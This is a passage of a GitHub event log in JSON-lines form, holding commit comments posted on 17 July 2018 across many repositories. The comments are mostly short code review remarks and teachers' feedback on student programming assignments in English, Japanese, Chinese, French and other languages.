种特价水果的名称：\"<<endl;\r\n        cin>>a;\r\n        cout<<\"请输入第 \"<<i<<\"  种特价水果的进价：\"<<endl;\r\n        cin>>b;\r\n        cout<<\"请输入第 \"<<i<<\"  种特价水果的售价：\"<<endl;\r\n        cin>>c;\r\n        b1[i-1].AddDiscKind(a,b,c);\r\n    }\r\n    cout<<\"正价水果有：\"<<endl;\r\n    cout<<b1[y].DispReguFruitKind;\r\n    cout<<\"正价水果有：\"<<endl;\r\n    cout<<b1[y].DispDiscFruitKind\r\n    return 0;\r\n}\r\n"}},"created_at":"2018-07-17T11:37:37Z"}
{"id":"7976120351","type":"CommitCommentEvent","actor":{"login":"lazka"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":29733451,"position":5,"line":54,"path":"quodlibet/quodlibet/qltk/views.py","commit_id":"4f8c38cd3c351efe1cbe160cb96aafbefd23f04f","created_at":"2018-07-17T11:37:41Z","updated_at":"2018-07-17T11:37:41Z","author_association":"MEMBER","body":"re broken I meant that their content was no longer aligned with the text behind it."}},"created_at":"2018-07-17T11:37:41Z"}
{"id":"7976121158","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29733452,"position":63,"line":707,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"2751eb5c67451bfe4f4bc5163101da01b20c87a0","created_at":"2018-07-17T11:37:51Z","updated_at":"2018-07-17T11:37:51Z","author_association":"COLLABORATOR","body":"it was about the münker-nekir stuff."}},"created_at":"2018-07-17T11:37:51Z"}
{"id":"7976125692","type":"CommitCommentEvent","actor":{"login":"lazka"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":29733463,"position":5,"line":54,"path":"quodlibet/quodlibet/qltk/views.py","commit_id":"4f8c38cd3c351efe1cbe160cb96aafbefd23f04f","created_at":"2018-07-17T11:38:51Z","updated_at":"2018-07-17T11:38:51Z","author_association":"MEMBER","body":"I can't think of a good way to test this"}},"created_at":"2018-07-17T11:38:51Z"}
{"id":"7976127571","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29733474,"position":84,"line":728,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"2751eb5c67451bfe4f4bc5163101da01b20c87a0","created_at":"2018-07-17T11:39:16Z","updated_at":"2018-07-17T11:39:16Z","author_association":"COLLABORATOR","body":"şeyleri ulamak? sesleri ulamak, bağcığı ulamak etc. Kinda rare."}},"created_at":"2018-07-17T11:39:16Z"}
{"id":"7976129021","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733479,"position":434,"line":1963,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:39:34Z","updated_at":"2018-07-17T11:39:34Z","author_association":"NONE","body":"nitpick: Tu aurais pu mettre les gates avant les div, comme sur le schema"}},"created_at":"2018-07-17T11:39:34Z"}
{"id":"7976132406","type":"CommitCommentEvent","actor":{"login":"maxvisser"},"repo":{"name":"initflow/me-android"},"payload":{"comment":{"id":29733491,"position":29,"line":51,"path":"presentation/src/main/java/io/forus/me/android/presentation/AndroidApplication.kt","commit_id":"fc866e2b3e2aae396d06bba488a4dab987f567ff","created_at":"2018-07-17T11:40:19Z","updated_at":"2018-07-17T11:40:19Z","author_association":"NONE","body":"whats stored inside store.private.toString()?\r\n\r\nif it stores the private key in plain text in keystore its ok for now. Already more secure than what we previous had. great job."}},"created_at":"2018-07-17T11:40:19Z"}
{"id":"7976134930","type":"CommitCommentEvent","actor":{"login":"stonecrusher"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29733497,"position":null,"line":null,"path":null,"commit_id":"6f64bd840cbbf3d6b979ace968b4884827c2afca","created_at":"2018-07-17T11:40:52Z","updated_at":"2018-07-17T11:40:52Z","author_association":"CONTRIBUTOR","body":"@tophf \r\nThe trailing spaces in the readmes are there for a reason, they make a new line without making a new paragraph (which would have too much margin-top) in markdown"}},"created_at":"2018-07-17T11:40:52Z"}
{"id":"7976139491","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733509,"position":520,"line":2049,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:41:52Z","updated_at":"2018-07-17T11:41:52Z","author_association":"NONE","body":"Avec le support de duty cycle et clk-phase ... doit y avoir tout ce qui faut pour ca je crois"}},"created_at":"2018-07-17T11:41:52Z"}
{"id":"7976139729","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29733510,"position":null,"line":null,"path":null,"commit_id":"6f64bd840cbbf3d6b979ace968b4884827c2afca","created_at":"2018-07-17T11:41:55Z","updated_at":"2018-07-17T11:41:55Z","author_association":"MEMBER","body":"I'll replace them with `<br>` to avoid the ambiguity."}},"created_at":"2018-07-17T11:41:55Z"}
{"id":"7976142237","type":"CommitCommentEvent","actor":{"login":"13724207478"},"repo":{"name":"13724207478/gitclass"},"payload":{"comment":{"id":29733514,"position":59,"line":59,"path":"LICENSE","commit_id":"e31aaa29f9ff984ecc15bfe13446ba2ffcf1a768","created_at":"2018-07-17T11:42:28Z","updated_at":"2018-07-17T11:42:28Z","author_association":"OWNER","body":"阿斯达所多撒"}},"created_at":"2018-07-17T11:42:28Z"}
{"id":"7976143119","type":"CommitCommentEvent","actor":{"login":"13724207478"},"repo":{"name":"13724207478/gitclass"},"payload":{"comment":{"id":29733521,"position":59,"line":59,"path":"LICENSE","commit_id":"e31aaa29f9ff984ecc15bfe13446ba2ffcf1a768","created_at":"2018-07-17T11:42:40Z","updated_at":"2018-07-17T11:42:40Z","author_association":"OWNER","body":"阿大声道"}},"created_at":"2018-07-17T11:42:40Z"}
{"id":"7976143553","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29733523,"position":null,"line":null,"path":null,"commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T11:42:46Z","updated_at":"2018-07-17T11:42:46Z","author_association":"NONE","body":"Tu n'as pas mis les deux clocks lcd, c'est volontaire ?"}},"created_at":"2018-07-17T11:42:46Z"}
{"id":"7976143690","type":"CommitCommentEvent","actor":{"login":"NetCone"},"repo":{"name":"NetCone/NetCone.github.io"},"payload":{"comment":{"id":29733525,"position":null,"line":null,"path":null,"commit_id":"a6922cb4fdb35626fcb6400ceb5a106536585cdb","created_at":"2018-07-17T11:42:48Z","updated_at":"2018-07-17T11:42:48Z","author_association":"OWNER","body":"wrong"}},"created_at":"2018-07-17T11:42:48Z"}
{"id":"7976154981","type":"CommitCommentEvent","actor":{"login":"janstary"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29733561,"position":null,"line":null,"path":null,"commit_id":"84ebeae68826927500ab6fc58250235a5989f07c","created_at":"2018-07-17T11:45:12Z","updated_at":"2018-07-17T11:45:12Z","author_association":"CONTRIBUTOR","body":"The `offset` in RD_packet_t` is when the packet arrived (since start of dump).\r\nThe `ts` in the actual RTP packet is how the sender timestamped it.\r\nThese are two different things, and there is no point in \"matcing them\".\r\nThe difference is why `rtpplay -T` exists."}},"created_at":"2018-07-17T11:45:12Z"}
{"id":"7976158779","type":"CommitCommentEvent","actor":{"login":"jerriep"},"repo":{"name":"jerriep/airport-explorer-source"},"payload":{"comment":{"id":29733579,"position":null,"line":null,"path":null,"commit_id":"3505ff6ea061390c31f7dad95cc72a46f49df795","created_at":"2018-07-17T11:45:58Z","updated_at":"2018-07-17T11:45:58Z","author_association":"OWNER","body":"I have no idea. Try it out and see whether it does."}},"created_at":"2018-07-17T11:45:58Z"}
{"id":"7976160765","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29733583,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-17T11:46:25Z","updated_at":"2018-07-17T11:46:25Z","author_association":"OWNER","body":"@Awzaw new Version uploaded with new codes updating."}},"created_at":"2018-07-17T11:46:25Z"}
{"id":"7976161565","type":"CommitCommentEvent","actor":{"login":"ebraminio"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29733586,"position":null,"line":null,"path":null,"commit_id":"3ab52c6cb5c405366af804d278216e2d02a39ecb","created_at":"2018-07-17T11:46:35Z","updated_at":"2018-07-17T11:46:35Z","author_association":"MEMBER","body":"Oh, thanks :)"}},"created_at":"2018-07-17T11:46:35Z"}
{"id":"7976163330","type":"CommitCommentEvent","actor":{"login":"marekkokot"},"repo":{"name":"refresh-bio/KMC"},"payload":{"comment":{"id":29733588,"position":null,"line":null,"path":null,"commit_id":"f56a92a243ea4ea8a56e24e61b93fd1ab2a00520","created_at":"2018-07-17T11:46:58Z","updated_at":"2018-07-17T11:46:58Z","author_association":"CONTRIBUTOR","body":"It's done. BTW we will upgrade to GPL 3, but again I don't know when :( It should resolve some licensing issues."}},"created_at":"2018-07-17T11:46:58Z"}
{"id":"7976166559","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18013/programming-term2"},"payload":{"comment":{"id":29733594,"position":null,"line":null,"path":null,"commit_id":"a091fb376094ba75be6b28bdbe50d6031abf51ff","created_at":"2018-07-17T11:47:39Z","updated_at":"2018-07-17T11:47:39Z","author_association":"NONE","body":"マークダウン記法について\r\n\r\nシャープやアスタリスクといった記号のあとには半角スペースを入れてください。\r\nあと、実は問題文に書いたディレクトリはsrc(ソース)ではなくdocs(文書)と書きました。移動お願いします。\r\n\r\n(参考)git mvを使ったgit管理下のファイルの移動\r\n※現在ファイルがあるディレクトリにて実行することが前提です。docs/algo-s2/ディレクトリは事前に作っておいてください。\r\n$ git mv task20180717_3.md ../../docs/algo-s2/"}},"created_at":"2018-07-17T11:47:39Z"}
{"id":"7976170651","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18013/programming-term2"},"payload":{"comment":{"id":29733608,"position":null,"line":null,"path":null,"commit_id":"a091fb376094ba75be6b28bdbe50d6031abf51ff","created_at":"2018-07-17T11:48:32Z","updated_at":"2018-07-17T11:48:32Z","author_association":"NONE","body":"1つ目の課題について\r\n上がプラス、下がマイナスなので、プラマイが逆です。"}},"created_at":"2018-07-17T11:48:32Z"}
{"id":"7976176225","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18013/programming-term2"},"payload":{"comment":{"id":29733621,"position":null,"line":null,"path":null,"commit_id":"a091fb376094ba75be6b28bdbe50d6031abf51ff","created_at":"2018-07-17T11:49:45Z","updated_at":"2018-07-17T11:49:45Z","author_association":"NONE","body":"(さっきプログラムの課題について誤ったコメントを載せましたが、間違ってたので削除しました。\r\n メールなどで通知がきてたら無視してください。すみません。)"}},"created_at":"2018-07-17T11:49:45Z"}
{"id":"7976176877","type":"CommitCommentEvent","actor":{"login":"nilsbehlen"},"repo":{"name":"privacyidea/privacyidea-authenticator"},"payload":{"comment":{"id":29733627,"position":null,"line":null,"path":null,"commit_id":"5a204553de62a5bc3b7e660dfa8b1faff835e18f","created_at":"2018-07-17T11:49:53Z","updated_at":"2018-07-17T11:49:53Z","author_association":"COLLABORATOR","body":"#38 "}},"created_at":"2018-07-17T11:49:53Z"}
{"id":"7976179039","type":"CommitCommentEvent","actor":{"login":"janstary"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29733632,"position":12,"line":189,"path":"Makefile","commit_id":"5558ad01fbf26a8d40bc86f6b53dd030064c724e","created_at":"2018-07-17T11:50:21Z","updated_at":"2018-07-17T11:50:21Z","author_association":"CONTRIBUTOR","body":"Why does this need to be written out, does the shell not understand `{foo,bar}`?"}},"created_at":"2018-07-17T11:50:21Z"}
{"id":"7976179183","type":"CommitCommentEvent","actor":{"login":"dmitrykurmanov"},"repo":{"name":"surveyjs/surveyjs"},"payload":{"comment":{"id":29733633,"position":null,"line":null,"path":null,"commit_id":"f2af3a10d3fcae4f506c7042fdc53ce55c5d8506","created_at":"2018-07-17T11:50:23Z","updated_at":"2018-07-17T11:50:23Z","author_association":"MEMBER","body":"@kamidev  hello! yes the problem with revoked npm tockens ( please look at https://status.npmjs.org/incidents/dn7c1fgrr7ng) . We will fix it ASAP. Thank you."}},"created_at":"2018-07-17T11:50:23Z"}
{"id":"7976179452","type":"CommitCommentEvent","actor":{"login":"shuttle1987"},"repo":{"name":"persephone-tools/persephone"},"payload":{"comment":{"id":29733635,"position":27,"line":157,"path":"persephone/corpus.py","commit_id":"0745b8a18fae3efa44272a843f12571a7b7fa985","created_at":"2018-07-17T11:50:27Z","updated_at":"2018-07-17T11:50:27Z","author_association":"MEMBER","body":"Is this where mypy was complaining?"}},"created_at":"2018-07-17T11:50:27Z"}
{"id":"7976182933","type":"CommitCommentEvent","actor":{"login":"GufCab"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":29733642,"position":null,"line":null,"path":null,"commit_id":"17265b63c83699dd8653a706fb427f9bf3cb1013","created_at":"2018-07-17T11:51:11Z","updated_at":"2018-07-17T11:51:11Z","author_association":"NONE","body":"It seems like this fixes a calendar issue introduced in 6.0.1 - do you know when a version with this will be released for npm?"}},"created_at":"2018-07-17T11:51:11Z"}
{"id":"7976186188","type":"CommitCommentEvent","actor":{"login":"janstary"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29733652,"position":null,"line":null,"path":null,"commit_id":"86b9805e2a8f68392dccf8183a87721e900aed81","created_at":"2018-07-17T11:51:52Z","updated_at":"2018-07-17T11:51:52Z","author_association":"CONTRIBUTOR","body":"Does it actually work? I don't have any RPM machine."}},"created_at":"2018-07-17T11:51:52Z"}
{"id":"7976186793","type":"CommitCommentEvent","actor":{"login":"wangkangdegithub"},"repo":{"name":"wangkangdegithub/detection"},"payload":{"comment":{"id":29733653,"position":null,"line":null,"path":null,"commit_id":"ab78632f81a5fef03a0667d6371f1401a72f9cea","created_at":"2018-07-17T11:52:00Z","updated_at":"2018-07-17T11:52:00Z","author_association":"OWNER","body":"新增代码段：指定故障类型的显示概率"}},"created_at":"2018-07-17T11:52:00Z"}
{"id":"7976191372","type":"CommitCommentEvent","actor":{"login":"arthus3"},"repo":{"name":"Blade2021/AssemblyAuto"},"payload":{"comment":{"id":29733665,"position":6,"line":221,"path":"AssemblyAuto/AssemblyAuto.ino","commit_id":"bdbc5a45c75ca6fe0953ae3fc877efa956566d81","created_at":"2018-07-17T11:52:59Z","updated_at":"2018-07-17T11:52:59Z","author_association":"COLLABORATOR","body":"Must test this part of code for null ending the array.\r\n\r\n@Blade2021 "}},"created_at":"2018-07-17T11:52:59Z"}
{"id":"7976199980","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18003/programming-term2"},"payload":{"comment":{"id":29733676,"position":null,"line":null,"path":null,"commit_id":"70b89dac5dbf7740746d8f338a2a1003ea225bb7","created_at":"2018-07-17T11:54:46Z","updated_at":"2018-07-17T11:54:46Z","author_association":"NONE","body":"マークダウン記法について(評定には影響しません)\r\n\r\n箇条書きのアスタリスクのあとは1バイト空けてくださいね。\r\nまた、文章の部分は普通に文章書いて良いですよ。\r\n\r\nアスタリスクを使う場合は何か箇条書きする必要がある場合、と覚えておいてください。\r\n例えば、\r\n・オレンジ\r\n・りんご\r\n・マンゴー\r\nという感じでリスト表示するときに使います。"}},"created_at":"2018-07-17T11:54:46Z"}
{"id":"7976200681","type":"CommitCommentEvent","actor":{"login":"arvindsv"},"repo":{"name":"gocd/gocd"},"payload":{"comment":{"id":29733681,"position":null,"line":null,"path":null,"commit_id":"b1cdbb141e4ae4eac00f4c5fb1f23f4b462ad5d3","created_at":"2018-07-17T11:54:56Z","updated_at":"2018-07-17T11:54:56Z","author_association":"MEMBER","body":"Yes, the UUID is not something a user is supposed to know. It is true that it will unique, but showing it in the title bar doesn't seem very useful to a user. I propose to leave it at hostname.\r\n\r\n/cc @tinozza Thoughts?"}},"created_at":"2018-07-17T11:54:56Z"}
{"id":"7976205927","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29733695,"position":null,"line":null,"path":null,"commit_id":"e0b4b48acc25cfd07e680a1c0d9d0fbb74a47ef5","created_at":"2018-07-17T11:56:04Z","updated_at":"2018-07-17T11:56:04Z","author_association":"NONE","body":"OKです!\r\n実はrandom.choice()関数の存在知りませんでした^^;"}},"created_at":"2018-07-17T11:56:04Z"}
{"id":"7976212578","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/front-end-project-week"},"payload":{"comment":{"id":29733706,"position":null,"line":null,"path":null,"commit_id":"5408025ef72eb3fdfb31abf80369670e5e83d859","created_at":"2018-07-17T11:57:28Z","updated_at":"2018-07-17T11:57:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create a note with a title and a content](https://trello.com/c/2gC9hm7r/2-create-a-note-with-a-title-and-a-content)"}},"created_at":"2018-07-17T11:57:28Z"}
{"id":"7976212603","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/front-end-project-week"},"payload":{"comment":{"id":29733707,"position":null,"line":null,"path":null,"commit_id":"5408025ef72eb3fdfb31abf80369670e5e83d859","created_at":"2018-07-17T11:57:28Z","updated_at":"2018-07-17T11:57:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create a note with a title and a content](https://trello.com/c/2gC9hm7r/2-create-a-note-with-a-title-and-a-content)"}},"created_at":"2018-07-17T11:57:28Z"}
{"id":"7976215448","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29733714,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-17T11:58:04Z","updated_at":"2018-07-17T11:58:04Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-17T11:58:04Z"}
{"id":"7976215724","type":"CommitCommentEvent","actor":{"login":"aloubyansky"},"repo":{"name":"yersan/galleon"},"payload":{"comment":{"id":29733715,"position":62,"line":159,"path":"maven-plugin/src/main/java/org/jboss/galleon/maven/plugin/ProvisionStateMojo.java","commit_id":"fd959d903d9fe6d9049fb032bd617011fc794c4c","created_at":"2018-07-17T11:58:08Z","updated_at":"2018-07-17T11:58:08Z","author_association":"NONE","body":"This variable looks redundant. You can initialize ProvisioningManager.Builder here and later instead of adding local paths to knownPaths, add them directly to pm.getLayoutFactory()"}},"created_at":"2018-07-17T11:58:08Z"}
{"id":"7976220304","type":"CommitCommentEvent","actor":{"login":"Jan-E"},"repo":{"name":"hydra3333/ffmpeg-windows-build-helpers-withOpenCL"},"payload":{"comment":{"id":29733729,"position":null,"line":null,"path":null,"commit_id":"4f863317dd8de70723881da5dbfd7e7da8e4bd44","created_at":"2018-07-17T11:59:02Z","updated_at":"2018-07-17T11:59:02Z","author_association":"NONE","body":"d3d11va is automatically enabled if the headers are there. MingwW64 5.0.2 and 5.0.4 have it. I am now using 5.0.4 slightly modified from @rdp 's repo.\r\n\r\nAre you using loudnorm one pass or two pass? For me, speed was everything so the choice was one pass, on the fly normalisation. Comment from 1 of the FFmpeg devs: it is very bad practice to want to do that. We will not do it. And now loudnorm has the option!"}},"created_at":"2018-07-17T11:59:02Z"}
{"id":"7976221442","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29733734,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-17T11:59:17Z","updated_at":"2018-07-17T11:59:17Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-17T11:59:17Z"}
{"id":"7976223905","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29733752,"position":13,"line":26,"path":"018/1801.html","commit_id":"1ef985cd24198648c326d62d50bd4bdfb959adb3","created_at":"2018-07-17T11:59:47Z","updated_at":"2018-07-17T11:59:47Z","author_association":"COLLABORATOR","body":"間違いでは無いです。無いのですが、  `newprofile`  のスコープについて意識するともう一箇所修正する場所に気づきそうです。いかがでしょう（実際には動作はするので絶対ダメ、というわけでは無いのですがより良いスタイルを身につけられているか確認させてください）。"}},"created_at":"2018-07-17T11:59:47Z"}
{"id":"7976229712","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18008/programming-term2"},"payload":{"comment":{"id":29733767,"position":null,"line":null,"path":null,"commit_id":"78baeffe02ac1403c6281f4fa1c383dfd7c2c035","created_at":"2018-07-17T12:00:53Z","updated_at":"2018-07-17T12:00:53Z","author_association":"NONE","body":"OKです。数量の部分はリスト内包表記を使っていてすごくスッキリしていますね。\r\nモジュール名もasでエイリアスを定義しているので、その分コードが短く済んで、良いと思います。"}},"created_at":"2018-07-17T12:00:53Z"}
{"id":"7976230648","type":"CommitCommentEvent","actor":{"login":"markknol"},"repo":{"name":"HaxeFoundation/HaxeManual"},"payload":{"comment":{"id":29733768,"position":null,"line":null,"path":null,"commit_id":"d55d922a7d93daddf669d049f263ab2d850d7b4f","created_at":"2018-07-17T12:01:07Z","updated_at":"2018-07-17T12:01:07Z","author_association":"MEMBER","body":"Thanks for reporting, that is clearly an oversight! Fixed it here https://github.com/HaxeFoundation/HaxeManual/commit/c9a71023be50bb2cb1a48250fa744dde9b3a7e7c"}},"created_at":"2018-07-17T12:01:07Z"}
{"id":"7976232898","type":"CommitCommentEvent","actor":{"login":"facetoe"},"repo":{"name":"facetoe/zenpy"},"payload":{"comment":{"id":29733771,"position":null,"line":null,"path":null,"commit_id":"d33ae7f94157981ff83f2fb6c2bfa0d8fc226a9e","created_at":"2018-07-17T12:01:33Z","updated_at":"2018-07-17T12:01:33Z","author_association":"OWNER","body":"@oleg-borodai, I've pushed a new version (2.0.6)."}},"created_at":"2018-07-17T12:01:33Z"}
{"id":"7976241491","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18010/programming-term2"},"payload":{"comment":{"id":29733782,"position":null,"line":null,"path":null,"commit_id":"1a4476d3c2636ccb8f091774e62e2ff23c112e42","created_at":"2018-07-17T12:03:19Z","updated_at":"2018-07-17T12:03:19Z","author_association":"NONE","body":"OKです。randint関数()だけを選択してimportしたんですね。\r\nコードも見やすく仕上がってると思います。"}},"created_at":"2018-07-17T12:03:19Z"}
{"id":"7976245027","type":"CommitCommentEvent","actor":{"login":"PhilippeBo"},"repo":{"name":"Nikvt/Articles-front-for-api"},"payload":{"comment":{"id":29733787,"position":10,"line":9,"path":"app/controllers/application_controller.rb","commit_id":"45fedc93e4cac9f1259545445ef20345078a4d81","created_at":"2018-07-17T12:04:01Z","updated_at":"2018-07-17T12:04:01Z","author_association":"NONE","body":"Pour moi les trois lignes la sont de trop.\r\n```\r\nuri = URI(url)\r\nresponse = Net::HTTP.get(uri)\r\n```\r\nAvec ca t'as assez"}},"created_at":"2018-07-17T12:04:01Z"}
{"id":"7976245944","type":"CommitCommentEvent","actor":{"login":"AndreiMaz"},"repo":{"name":"nopSolutions/nopCommerce"},"payload":{"comment":{"id":29733790,"position":4,"line":137,"path":"src/Presentation/Nop.Web/Areas/Admin/Controllers/PluginController.cs","commit_id":"d48f9bcc9119176af57069d81495e9c6bd7dedf4","created_at":"2018-07-17T12:04:12Z","updated_at":"2018-07-17T12:04:12Z","author_association":"MEMBER","body":"опечатка"}},"created_at":"2018-07-17T12:04:12Z"}
{"id":"7976247250","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29733791,"position":11,"line":63,"path":"app/src/main/java/br/com/alura/leilao/ui/recyclerview/adapter/ListaUsuarioAdapter.java","commit_id":"432a2833be485040cfed5d3afb8d15d2d7032494","created_at":"2018-07-17T12:04:28Z","updated_at":"2018-07-17T12:04:28Z","author_association":"OWNER","body":"Para restringir o máximo possível dado que é uma sub classe"}},"created_at":"2018-07-17T12:04:28Z"}
{"id":"7976249344","type":"CommitCommentEvent","actor":{"login":"stilley2"},"repo":{"name":"conda-forge/filesdb-feedstock"},"payload":{"comment":{"id":29733794,"position":null,"line":null,"path":null,"commit_id":"d5dc320531149798dd71592467badbd5692d678b","created_at":"2018-07-17T12:04:53Z","updated_at":"2018-07-17T12:04:53Z","author_association":"CONTRIBUTOR","body":"Thanks for the cleanup!"}},"created_at":"2018-07-17T12:04:53Z"}
{"id":"7976254950","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29733798,"position":null,"line":null,"path":null,"commit_id":"8e67cdce24a4eb66cf435e21b3cd626ed7094dc8","created_at":"2018-07-17T12:06:01Z","updated_at":"2018-07-17T12:06:01Z","author_association":"NONE","body":"修正OKです。提出物としてはこれで評価します。"}},"created_at":"2018-07-17T12:06:01Z"}
{"id":"7976256076","type":"CommitCommentEvent","actor":{"login":"mart-e"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29733799,"position":null,"line":null,"path":null,"commit_id":"57676dc7d10b50bee44d122d48863586b18e4593","created_at":"2018-07-17T12:06:14Z","updated_at":"2018-07-17T12:06:14Z","author_association":"CONTRIBUTOR","body":"@seb-elico why master? The documentation is published in several versions, starting from version 9 and the stability guidelines don't really apply here.\r\nYou can fix in the lowest version that has the problem for something as obviously wrong as a duplicated line."}},"created_at":"2018-07-17T12:06:14Z"}
{"id":"7976259992","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29733812,"position":null,"line":null,"path":null,"commit_id":"63d4d86b09137a9b88faffd704989f70453d9d18","created_at":"2018-07-17T12:07:04Z","updated_at":"2018-07-17T12:07:04Z","author_association":"COLLABORATOR","body":"成田\r\nswitch分の見易さが損なわれる書き方になっているように感じます。\r\n好みもあるので修正はいりませんが、私はこんな風に書いてます。\r\n\r\nswitch( someInteger )\r\n{\r\n    case 1:\r\n        cout << \"1\";\r\n        break;\r\n    case 2:\r\n        cout << \"2\";\r\n        break;\r\n    default:\r\n        break;\r\n}\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-17T12:07:04Z"}
{"id":"7976263205","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29733830,"position":5,"line":20,"path":"018/1801.html","commit_id":"1ef985cd24198648c326d62d50bd4bdfb959adb3","created_at":"2018-07-17T12:07:44Z","updated_at":"2018-07-17T12:07:44Z","author_association":"COLLABORATOR","body":"課題2 はバッチリですね！ var が必要なんです。"}},"created_at":"2018-07-17T12:07:44Z"}
{"id":"7976263952","type":"CommitCommentEvent","actor":{"login":"amauriSouza"},"repo":{"name":"amauriSouza/exercises_webpack"},"payload":{"comment":{"id":29733833,"position":4,"line":4,"path":"ex.1/index.jsx","commit_id":"ab38590280429f435152983258ee5cfcae4163f1","created_at":"2018-07-17T12:07:53Z","updated_at":"2018-07-17T12:07:53Z","author_association":"OWNER","body":"Faltou ponto e virgula ';'"}},"created_at":"2018-07-17T12:07:53Z"}
